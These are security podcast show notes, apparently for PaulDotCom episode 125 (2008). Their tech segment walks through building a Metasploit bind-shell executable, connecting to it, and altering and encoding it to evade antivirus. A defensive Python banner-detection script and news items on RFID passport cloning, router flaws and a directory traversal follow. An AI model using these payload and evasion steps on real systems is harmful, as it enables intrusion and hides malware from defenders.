From Security Weekly Wiki


Core Security

This episode is sponsored by Core Security Technologies, helping you penetrate your network. Rock out with your 'sploit out and check out the client side exploit and web application testing modules! Listen to this podcast and qualify to receive a 10% discount on Core Impact, the world's best penetration testing tool.

Tenable Network Security

This podcast is also sponsored by Tenable Network Security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notably the creators of Nessus, the world's best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Direct Feed subscription for immediate access to new Nessus plugins and compliance checks. Tenable – Unified Security Monitoring!


Astaro offers the most complete and easy to use Internet security appliances available. The products combine best of breed applications, the proven quality of Linux and enterprise level performance, providing the latest protection with the best total cost of ownership. All products are available as software, hardware or virtual appliances, which allows users the flexibility to meet a wide variety of deployment scenarios.

One of the best things about Astaro is that it offers its products completely free for home use. All enterprise features and all subscriptions, including virus scanning, web content filtering, email filtering and VPN clients, are available in the home license for no cost. All you have to do is visit www.astaro.com, register, download the software and obtain the key, which protects up to 10 IPs. There are no sales people to talk to, no payment information to enter—it’s just free. Again, visit www.astaro.com for more information or to download the product and free home user license.

Announcements & Shameless Plugs

Live from the PaulDotCom Studios Welcome to PaulDotCom Security Weekly, Episode 125 for September 30th, 2008

Welcome to PaulDotCom Security Weekly, a show for security professionals, by security professionals.

  • PaulDotCom SANS Click-Through - Go there, register for fabulous SANS training! Go now!
  • ICE (Integrated Cyber Exercise) - Oct. 1-3 at SANS Las Vegas! - Now featuring observers from the Air Force Cyber Command (P), Air Force Information Operations Center and United States Air Force Warfare Center. Paul and Larry have Team names: The Steadfast Buccaneers and The Network Ninja Assassins!
  • ChicagoCon - October 27 - November 1, Talks by Ed Skoudis, Gregory Conti West Point, Author of "Security Data Visualization", Daniel V. Hoffman CTO SMobile Systems, EH-Net Columnist, Billy Rios/John Walton Microsoft Pen Testers (Blue Hat)

Tech Segment: Bypassing Anti-Virus Software The Script-Kiddie Way

Pass #1 - Metasploit 3.1-release Payload - Unmodified

msfpayload windows/shell_bind_tcp LPORT=6453 X > payload.exe

The above command produces a windows binary that listens on TCP port 6453 for a remote shell. You can access the remote shell using netcat as follows:

funnyhostname:~ pdc$ ncat 6453
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>

The payload generated above when uploaded to Virus Total only gets detected by 7 out of 36 anti-virus engines. If we look at the payload with our super 1337 reverse engineering tool (the "strings" command), we can see that we are giving ourselves away:

"Reverse Engineering The Payload"

bash-3.2# strings payload.exe 
!This program cannot be run in DOS mode.
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_bind_tcp
 Length: 317
Options: LPORT=6453

Pass #2 - Metasploit Payload - Changed Version String

Editing msfpayload to change the version string:

  if (cmd =~ /^x/)
    # The first line of the note used to read
    # "Created by msfpayload (http://www.metasploit.com)." (see the strings
    # output above); only that line is changed, the rest is left as-is.
    note =
      "PaulDotCom's Evil Payload\n" +
      "Payload: " + payload.refname + "\n" +
      " Length: " + buf.length.to_s + "\n" +
      "Options: " + options + "\n"
  end

The payload generated above when uploaded to Virus Total only gets detected by 6 out of 36 anti-virus engines. (Panda anti-virus relied on the Metasploit payload string in the binary).

Pass #3 - Metasploit (svn version as of 9-28-08) Payload Encoded With Shikata Ga Nai

msfencode x86/shikata_ga_nai -i svn-payload.exe -t exe > svn-encode-payload.exe

The payload generated above when uploaded to Virus Total only gets detected by 4 out of 36 anti-virus engines. However, it did not function in my testing, though it does show how we can evade anti-virus systems.
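From the defender's side, the strings output in Pass #1 and the edit in Pass #2 show why a signature that keys only on the "Created by msfpayload" banner is brittle: the "Payload:" and "Options:" lines were left untouched. The following added example (not code from the show or from Metasploit) reimplements the `strings` extraction and checks a binary for all three banner lines, run against constructed stand-ins for the Pass #1 and Pass #2 binaries rather than real PE files.

```python
import re
from typing import List, Tuple

# Minimum run of printable bytes to report, the same default as the `strings` command.
MIN_LEN = 4

# Banner lines msfpayload writes into a generated executable (see the
# `strings payload.exe` output above). Pass #2 only rewrote the first line,
# so the other two are the more durable anchors for a detection signature.
MSF_MARKERS = [
    re.compile(rb"Created by msfpayload"),
    re.compile(rb"Payload: windows/\w+"),
    re.compile(rb"Options: LPORT=\d+"),
]


def extract_strings(data: bytes, min_len: int = MIN_LEN) -> List[bytes]:
    """Return runs of printable ASCII of at least min_len bytes, as `strings` prints them."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)


def msfpayload_markers(data: bytes) -> List[Tuple[str, bytes]]:
    """Report which msfpayload banner markers occur among the binary's strings."""
    hits = []
    for s in extract_strings(data):
        for pat in MSF_MARKERS:
            m = pat.search(s)
            if m:
                hits.append((pat.pattern.decode(), m.group(0)))
    return hits


# Constructed stand-ins for the two binaries: a DOS header stub plus the banner
# text seen in the strings output; the real PE bodies are omitted.
PASS1 = (b"MZ\x90\x00" + b"\x00" * 8 +
         b"Created by msfpayload (http://www.metasploit.com).\n"
         b"Payload: windows/shell_bind_tcp\n Length: 317\nOptions: LPORT=6453\n" +
         b"\x00" * 8)
PASS2 = PASS1.replace(b"Created by msfpayload (http://www.metasploit.com).",
                      b"PaulDotCom's Evil Payload")


def compare_passes() -> dict:
    """Markers found in each pass; Pass #2 still trips two of the three."""
    return {"pass1": msfpayload_markers(PASS1), "pass2": msfpayload_markers(PASS2)}


if __name__ == "__main__":
    for name, hits in compare_passes().items():
        print(name, [m.decode() for _, m in hits])
```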

Stories Of Interest

Faking passports the THC way - [PauldotCom] - Talk about identity theft! Why do governments not learn that RFID is not secure? It's wireless all over again, transmitting in the clear and using poor encryption. The defense here: get an RF-shielding wallet and/or case to keep your RF-enabled stuff in. Like, your credit card... [Larry] - vonJeek modified RFIDiot to clone e-passports to a 72 K smart card with incorrect information. It works because the sanity checking is apparently broken.

Linksys WRT350N unauthorized access - [PaulDotCom] - So, this is perhaps one of the lamest vuln write-ups, but let's go through it anyway:

  • Router contains an "Outdated Samba 3.0.2, vulnerable to numerous security holes." Okay, well, that sucks (See metasploit for associated exploit, msf > use linux/samba/lsa_transnames_heap). Supposedly, there is no way to disable the samba server.
  • "Default admin:admin user" - This is the default on most routers. I beg and plead with vendors to allow the user to set the initial password, but it falls on deaf ears.
  • "Default open guest user, no way to disable it" - Hrm, I wonder two things: 1) what privs does the guest user get? 2) Why can't it be disabled!

HP Insight Diag remote exploit - [PaulDotCom] - I hate vuln write-ups that provide no information. This one in particular is scary, because where is InSight typically installed? On all your servers! So in one fell swoop I can pwn your server farm, and until you find a patch, there is no information for you to implement a workaround. Because you know, when a patch comes out for all of your servers, you don't take time to test it, you just blast it out, right? :) [Larry] - Not a lot of detail here, except that a "ential security vulnerability has been identified with HP Insight Diagnostics. The vulnerability could be remotely exploited to gain unauthorized access to files." In fact the referenced CVE has even less info!

Indirect iPhone forensics - [PaulDotCom] - I filed this in the category of "Neat!". In the backup files for your iPhone, you can extract the text messages. Sometimes you can find good stuff in text messages, like passwords and phone numbers, and this method is way better than trying to sniff them off the wire, which is illegal.

Rooting Phillips - [PaulDotCom] - While it doesn't give you access to /etc/shadow, here is a vulnerability in a web application that gives anyone on the internet access to /etc/passwd on the web server. This is totally awesome! Oh wait, we really should give the company a chance (and the vendor) to patch it first, right? [Larry] - Wow, stupid configuration issues allow directory traversal attacks on a Phillips website.